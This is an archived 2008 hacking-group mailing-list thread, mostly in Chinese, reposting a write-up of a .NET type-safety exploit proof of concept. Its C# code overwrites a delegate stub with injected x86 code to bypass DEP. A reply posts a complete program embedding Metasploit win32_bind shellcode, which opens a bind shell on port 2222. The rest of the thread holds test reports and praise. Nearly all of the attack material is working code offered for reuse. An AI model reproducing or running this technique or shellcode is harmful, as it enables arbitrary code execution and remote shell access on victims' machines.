[zz]Writing a .NET Security Exploit PoC

[大风]

 

Let's start out with some convenient types that allow bit twiddeling once we've subverted the type system:

class Union1
{
  internal volatile int i;
  internal volatile int j;
}

class Union2
{
  internal volatile object o;
  internal volatile int[] arr;
}

Now we need a way to get two different references to the same object. This is where the exploit comes in, but since I'm not going to publish an exploit for an unpatched bug, we'll make do with something that works but requires full trust:

[StructLayout(LayoutKind.Explicit)]
struct UnsafeUnion
{
  [FieldOffset(0)]
  internal Union1 u1;
  [FieldOffset(0)]
  internal Union2 u2;
}

static Union1 TypeSystemHole(Union2 u2)
{
  // NOT ACTUALLY A SECURITY HOLE!
  // You need full trust to execute this code.
  UnsafeUnion uu = new UnsafeUnion();
  uu.u2 = u2;
  return uu.u1;
}

Now for the interesting bit, getting some x86 code to execute:

Union1 u1;
Union2 u2 = new Union2();
u1 = TypeSystemHole(u2);

// u1 and u2 now reference the same object,
// meaning that we can now convert arbitrary integer
// into objects or arrays (and v.v.)

ThreadStart del = new ThreadStart(DummyMethod);

// A delegate provides an easy way to call the code we're
// generating. As it turns out, it is also a good way
// to bypass DEP, because the delegate stub is in writable
// executable memory.

u2.o = del;
u1.j = u1.i;
u1.j = u2.arr[2] - 12;

// Make the delegate object accessible via the object[],
// then get the address the delegate points to and make
// it accessible via the object[] reference.

// The x86 code we're creating is:
//
// 6A 05            push 5
// 68 xx xx xx xx   push offset string "calc.exe"
// B8 xx xx xx xx   mov eax,<address of kernel32!WinExec>
// FF D0            call eax
// C3               ret
//

MemoryStream mem = new MemoryStream();
BinaryWriter bw = new BinaryWriter(mem);
bw.Write((byte)0x6A);
bw.Write((byte)0x05);
bw.Write((byte)0x68);
u2.o = Encoding.ASCII.GetBytes("calc.exe\0");
bw.Write(u1.i + 8);
bw.Write((byte)0xB8);
bw.Write(GetProcAddressAny("WinExec"));
bw.Write((byte)0xFF);
bw.Write((byte)0xD0);
bw.Write((byte)0xC3);
bw.Write(0);

// Now that we've created the code, copy it into the delegate
// stub memory area.

byte[] tmp = mem.ToArray();
for (int i = 0; i < tmp.Length / 4; i++)
{
  u2.arr[1 + i] = BitConverter.ToInt32(tmp, i * 4);
}

// Invoke the delegate, which will result in running our
// code, instead of the delegate stub.

del();

The missing piece is GetProcAddressAny. It basically searches memory for kernel32 and looks up the address of the WinExec function.

The full source is available here: TypeSafetyExploitPoC.cs

Note that this PoC requires full trust and obviously only works on x86, but all the ideas are applicable to x64 as well.

2008-9-13 9:03:01 (W. Europe Daylight Time, UTC+02:00)

 

 

 

[Ph4nt0m]

[Ph4nt0m Security Team]

                  刺@ph4nt0m

          Email:  ax...@ph4nt0m.org

          PingMe:

          === V3ry G00d, V3ry Str0ng ===

          === Ultim4te H4cking ===

          === XPLOITZ ! ===

          === #_# ===

#If you brave,there is nothing you cannot achieve.#

 

 

[kj021320]

 我这边运行 测试不OK~~  VS2005的!  云舒~~ 你那边试试看!

---

[广告] e100办理业务，抽取心动大奖，惊喜连连，赶快行动！

[Program_Worker]

VS2008测试没有通过

> <http://www.frijters.net/TypeSafetyExploitPoC.cs.txt>

>
> Note that this PoC requires full trust and obviously only works on x86, but
> all the ideas are applicable to x64 as well.
>
> 2008-9-13 9:03:01 (W. Europe Daylight Time, UTC+02:00)
>

> [Ph4nt0m] <http://www.ph4nt0m.org/>
>
> [Ph4nt0m Security Team]
>
> <http://blog.ph4nt0m.org/> 刺@ph4nt0m
>
> Email: a...@ph4nt0m.org
>
> PingMe:
> <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=han...
> hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>

>
> === V3ry G00d, V3ry Str0ng ===
>
> === Ultim4te H4cking ===
>
> === XPLOITZ ! ===
>
> === #_# ===
>
> #If you brave,there is nothing you cannot achieve.#
>

> image001.gif
> 5K查看下载

[云舒]

using System;

using System.IO;

using System.Threading;

using System.Text;

using System.Runtime.InteropServices;

class Union1

{

internal volatile int i = 0;

internal volatile int j;

}

class Union2

{

internal volatile object o;

internal volatile int[] arr = null;

}

class TypeSafetyExploitPoC

{

[StructLayout(LayoutKind.Explicit)]

struct UnsafeUnion

{

[FieldOffset(0)]

internal Union1 u1;

[FieldOffset(0)]

internal Union2 u2;

}

static Union1 TypeSystemHole(Union2 u2)

{

// NOT ACTUALLY A SECURITY HOLE!

// You need full trust to execute this code.

UnsafeUnion uu = new UnsafeUnion();

uu.u2 = u2;

return uu.u1;

}

static void DummyMethod()

{

}

internal static void Main(string[] args)

{

Union1 u1;

Union2 u2 = new Union2();

u1 = TypeSystemHole(u2);

ThreadStart del = new ThreadStart(DummyMethod);

u2.o = del;

u1.j = u1.i;

u1.j = u2.arr[2] - 12;

MemoryStream mem = new MemoryStream();

BinaryWriter bw = new BinaryWriter(mem);

BinaryReader reader = new BinaryReader(mem);

try

{

// win32_bind -  EXITFUNC=thread LPORT=2222 Size=344 Encoder=PexFnstenvSub http://metasploit.com

byte[] shellcode = { 0x29, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0x0e, 0x4b, 0x46, 0x7e, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xf2, 0x21, 0xad, 0x33, 0xe6, 0xb2, 0xb9, 0x81, 0xf1, 0x2b, 0xcd, 0x12, 0x2a, 0x6f, 0xcd, 0x3b, 0x32, 0xc0, 0x3a, 0x7b, 0x76, 0x4a, 0xa9, 0xf5, 0x41, 0x53, 0xcd, 0x21, 0x2e, 0x4a, 0xad, 0x37, 0x85, 0x7f, 0xcd, 0x7f, 0xe0, 0x7a, 0x86, 0xe7, 0xa2, 0xcf, 0x86, 0x0a, 0x09, 0x8a, 0x8c, 0x73, 0x0f, 0x89, 0xad, 0x8a, 0x35, 0x1f, 0x62, 0x56, 0x7b, 0xae, 0xcd, 0x21, 0x2a, 0x4a, 0xad, 0x18, 0x85, 0x47, 0x0d, 0xf5, 0x51, 0x57, 0x47, 0x95, 0x0d, 0x67, 0xcd, 0xf7, 0x62, 0x6f, 0x5a, 0x1f, 0xcd, 0x7a, 0x9d, 0x1a, 0x85, 0x08, 0x76, 0xf5, 0x4e, 0x47, 0xcd, 0x0e, 0x12, 0xe6, 0xcd, 0x3e, 0x06, 0x15, 0x2e, 0xf0, 0x40, 0x45, 0xaa, 0x2e, 0xf1, 0x9d, 0x20, 0x2d, 0x68, 0x23, 0x75, 0x4c, 0x66, 0x3c, 0x35, 0x4c, 0x51, 0x1f, 0xb9, 0xae, 0x66, 0x80, 0xab, 0x82, 0x35, 0x1b, 0xb9, 0xa8, 0x51, 0xc2, 0xa3, 0x18, 0x8f, 0xa6, 0x4e, 0x7c, 0x5b, 0x21, 0x44, 0x81, 0xde, 0x23, 0x9f, 0x77, 0xfb, 0xe6, 0x11, 0x81, 0xd8, 0x18, 0x15, 0x2d, 0x5d, 0x18, 0x05, 0x2d, 0x4d, 0x18, 0xb9, 0xae, 0x68, 0x23, 0x4e, 0xd0, 0x68, 0x18, 0xcf, 0x9f, 0x9b, 0x23, 0xe2, 0x64, 0x7e, 0x8c, 0x11, 0x81, 0xd8, 0x21, 0x56, 0x2f, 0x5b, 0xb4, 0x96, 0x16, 0xaa, 0xe6, 0x68, 0x97, 0x59, 0xb4, 0x90, 0x2d, 0x5b, 0xb4, 0x96, 0x16, 0xeb, 0x02, 0xc0, 0x37, 0x59, 0xb4, 0x90, 0x2e, 0x5a, 0x1f, 0x13, 0x81, 0xde, 0xd8, 0x2e, 0x99, 0x77, 0x8d, 0x3f, 0x29, 0xf1, 0x9d, 0x13, 0x81, 0xde, 0x2d, 0x2c, 0x1a, 0x68, 0x23, 0x25, 0x13, 0x87, 0xae, 0x2c, 0x2e, 0x57, 0x62, 0x8a, 0xf7, 0xe9, 0x21, 0x02, 0xf7, 0xec, 0x7a, 0x86, 0x8d, 0xa4, 0xb5, 0x04, 0x53, 0xf0, 0x09, 0x6a, 0xed, 0x83, 0x31, 0x7e, 0xd5, 0xa5, 0xe0, 0x2e, 0x0c, 0xf0, 0xf8, 0x50, 0x81, 0x7b, 0x0f, 0xb9, 0xa8, 0x55, 0x1c, 0x14, 0x2f, 0x5f, 0x1a, 0x2c, 0x7f, 0x5f, 0x1a, 0x13, 0x2f, 0xf1, 0x9b, 0x2e, 0xd3, 0xd7, 0x4e, 0x88, 0x2d, 0xf1, 0x9d, 0x2c, 0x81, 0xf1, 0x7c, 0xb9, 0xae, 0x85, 0x1c, 0xba, 0xfd, 0xca, 0x2f, 0xb9, 0xa8, 0x5c, 0xb4, 0x96, 0x16, 0xe1, 0x85, 0xa6, 0x1e, 0x5d, 0xb4, 0x90, 0x81, 0xde, 0x4b, 0x46, 0x7e };

bw.Write( shellcode, 0, shellcode.Length );

}

catch( Exception e )

{

Console.WriteLine( "Write error." + e.Message ); 

}

try

{

byte[] tmp = mem.ToArray();

for (int i = 0; i < tmp.Length / 4; i++)

{

u2.arr[1 + i] = BitConverter.ToInt32(tmp, i * 4);

}

del();

}

catch

{

}

}

}

 

 

2008-09-17

---

云舒

---

发件人： Program_Worker

发送时间： 2008-09-17  11:24:40

收件人： Ph4nt0m

抄送：

主题： [Ph4nt0m] Re: Writing a .NET Security Exploit PoC

[ayaREI]

云舒牛牛果然厉害....

据tankaiha大牛说XX东西的漏洞是很多的，看来需要学习的啊

2008/9/17 云舒 <yun...@yahoo.cn>

[飞扬天下]

无语了，你们都已经C#了，我还在C呢。

[井底之蛙]

云舒怎么什么语言脚本都会啊……奇了怪了

有没有不会的，呵呵……

----- Original Message -----

From: ayaREI

To: ph4...@googlegroups.com

Sent: Wednesday, September 17, 2008 7:09 PM